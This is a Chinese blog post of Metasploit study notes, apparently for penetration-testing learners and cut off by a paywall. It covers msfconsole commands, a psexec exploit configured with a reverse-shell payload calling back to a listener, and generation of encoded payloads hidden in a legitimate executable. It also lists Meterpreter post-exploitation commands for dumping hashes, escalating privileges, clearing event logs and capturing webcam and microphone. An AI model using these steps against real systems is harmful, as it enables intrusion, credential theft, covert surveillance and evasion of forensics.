kaliMSF笔记

最新推荐文章于 2024-05-31 16:35:50 发布
最新推荐文章于 2024-05-31 16:35:50 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: kali渗透测试学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fhl5203/article/details/102860732
版权

metasploit framework

基本使用

msfconsole使用接口
最流行的用户接口
几乎可以使用全部MSF功能
控制台命令支持TAB自动补齐
支持外部命令的执行(系统命令等)
点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息
help / ? / help vulns

MSF控制台命令

Banner、Color
connect 类似nc

show auxiliary / exploits 等,显示所有

search usermap_script / help search
search name:mysql / path:scada / platform:aix / type:aux /author:aaron / cve:2011
可多条件同时搜索,-h查看

use dos/windows/smb/ms09_001_write
show options / payloads / targets / advanced / evasion
info查看信息、edit编辑脚本
Check、back

db_status数据库连接状态
db_rebuild_cache重新生成搜索缓存

db_nmap
hosts / host 1.1.1.1 / hosts -u / hosts -c address,os_flavor -S Linux 查看扫描到的主机
services -p 80 / services -c info,name -p 1-1000 查看开放的端口及服务
vulns 查看扫描出的漏洞 / creds (mysql_login) 查看破解出的密码 / loot (hashdump) 查看获取到的哈希值

db_disconnect / db_connect 断开、连接数据库
/usr/share/metasploit-framework/config/database.yml 默认数据库存放位置

db_import / db_export 数据库导出导入
db_import /root/nmap.xml
db_export -f xml /root/bak.xml

set / unset / setg设为默认直到退出 / unsetg / save 设为默认且一直存在
run / exploit 都一样
jobs / kill 0
load 加载openvas sqlmap等/ unload /loadpath加载自己写的模块的路径
session -l / -i (Shell、Meterpreter session、VNC)看获得的session
route通过指定session路由流量
irb(Framework::Version)编程
resource (msfconsol -r a.rc)自己写好个.rc,会自动执行一系列命令

exploit模块

Active exploit 主动
use exploit/windows/smb/psexec
set RHOST 192.168.1.100
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
set SMBUSER user1
set SMBPASS pass1
exploit

Passive Exploits 被动
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
set URIPATH /
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit

生成payload

use payload/windows/shell_bind_tcp

generate -b ‘\x00’ 生成payload并自动选择编码模块绕过坏字符,要绕过的坏字符太多会导致没有可用的模块

手动指定编码模块
show encoders
generate -e x86/nonalpha

generate -b ‘\x00’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
i设置重复编码几次 b绕过坏字符 e指定编码模块 k多线程 x使用模板 t输出格式

NOP:no-operation或叫Next Operation,无任何操作的字节,EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行,generate -s 14

meterpreter

高级、动态、可扩展的payload
后渗透测试阶段一站式操作界面

完全基于内存的DLL注入式payload(不写硬盘)
注入合法系统进程并建立stager
基于stager上传和预加载DLL进行扩展模块的注入
基于stager建立的socket连接建立加密的TLS/1.0通信隧道
利用TLS隧道进一步加载后续扩展模块(避免网络取证)

服务端使用C语言编写
客户端提供基于ruby的全特性API

meterpreter基本命令

Help 帮助background返回
Run执行一系列功能 bgrun在后台执行

Cd ls cat pwd dir mkdir mv rm rmdir edit就是vi
Windows和Linux的命令通用

lpwd lcd 等于在本机执行pwd、cd
clearev清除日志信息 download从控制的机器上下载文件
upload /usr/share/windows-binaries/nc.exe c:\windows\system32上传文件
execute -f cmd.exe -i –H 执行命令
getuid查看当前账号 getsystem获取system权限 getprivs查看当前权限 getproxy查看系统代理信息 getpid获取所注入进程的PID

Hashdump run post/windows/gather/hashdump
sysinfo ps kill migrate迁移进程 reboot shutdown shell
show_mount 显示挂载的硬盘 search -f autoexec.bat搜索文件
arp查看ARP缓存 netstat查看网络连接情况 ipconfig ifconfig route
Idletime查看空闲时间 resource类似msf的resource
record_mic记录麦克风声音 webcam_list摄像头列表 webcam_snap -i 1 -v false每一秒截摄像头一次

meterpreter Python扩展
无需运行环境,在客户端运行Python原生代码
load python
help
python_execute “print (‘asdasdas’)”
python_execute “import os; cd

最低0.47元/天 解锁文章
fhl5203
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
metasploit常用命令
Johnathan的博客
03-03 536
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
MSF控制台命令
分享学习网络的点点滴滴
12-27 507
首先启动msfdb。
【Web安全】kali渗透工具MSF以及msfconsole命令详解
最新发布
2301_77472496的博客
05-31 1035
记录一次体验kali渗透工具MSF以及msfconsole命令详解
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
Kali渗透测试:散列密码破解
Liu_Bruce的博客
05-26 4096
Kali渗透测试:散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
解决:关于msf更新后,无法启动/找到的问题
u011430678的博客
10-19 749
今天在启动msf的时候,msfupdate对框架进行了升级。问题出现在msf更新完成之后,提示找不到这样的文件或目录。安装过程很简单,只需要等待几分钟便可。
kali-linux笔记
01-10
个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践...
kali学习笔记1.pdf
07-19
笔记记录了详细的从网络扫描,信息收集(被动信息收集技术讲解,主动信息收集(各层协议的主动扫描方法{从网络层到应用层},nmap扫描器的使用全参数讲解),系统漏洞扫描器缓...笔记还有第二章,可以直接搜索kali学习笔记2
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
kali Linux渗透技术详解笔记
07-27
kali Linux环境部署,Linux相关命令,枚举工具,简单网络管理协议,邮件传输协议。
Kali msf教程
08-24
kali linux msf系列教程
网络安全:kaliMSF工具基本使用方法
Mr_qing的博客
10-08 5109
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
msf之提权操作
帅醉了的博客
03-07 2491
愿疫情早日结束,重返校园奋斗 使用getsystem来获得最高权限 getsystem 发现却爆出这样的错误 [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted: [-] Named Pipe Impersonation (In Memory...
后渗透阶段-meterpreter使用
weixin_39986112的博客
04-08 411
sessions -l 查看我们获得的shell session -i 1 即可切换到id为1的shell sysinfo 查看目标主机的信息 getwd 可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录 route 可以查看路由 getproxy #查看代理信息 autoroute添加路由 run autoroute –h #查看帮助 ...
msfh零二一_MSFH-003:二师姐诗月圆粉墨登场
weixin_32452829的博客
12-28 2万+
大家还记得水沢美心吗?就是上个月底在SOD集团新片商Ms.SOD登场的摩登女郎,作为新片商的开路先锋,水沢美心向观众展示了自己的不凡魅力,如今已经过去了1个月,Ms.SOD再次迎来了第二位新秀,她的名字叫做诗月圆,登场作品MSFH-003。通常新片商的首位女艺人都备受关注,例如FALENO旗下的美乃雀以及Ms.SOD的水沢美心,但詩月まどか的出现却打破了这一常规,以Ms.SOD第二位女艺人身份出场...
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4374
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
kail环境下msf框架攻击ms17-010(永恒之蓝)漏洞演示
weixin_46447549的博客
04-23 7229
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言前言实验目的实验环境实验步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 前言 MS17-010(永恒之蓝)是一种操作系统漏洞,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Secu.
Kali Linux渗透测试——MSF基础篇
Captain_RB的博客
01-04 1万+
MSF学习笔记——基础篇MSF学习笔记——基础篇一、MSF基本介绍1.版本区分2.MSF架构二、MSF基本使用1.功能模块2.基本命令3.数据库命令三、MSF模块使用(一)Exploit模块(二)Payload/Encoder模块四、Meterpreter(一)Meterpreter简介(二)Meterpreter常用命令(三)Meterpreter python扩展五、Msfcli MSF学习笔...
kali 使用笔记本网卡
08-05
根据引用中的内容,可以看出在Kali中使用笔记本网卡有两种方式:使用有线网络连接或使用无线网络连接。 如果你想使用有线网络连接,你可以编辑网络接口配置文件,将接口设置为自动获取IP地址的DHCP模式。具体操作是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值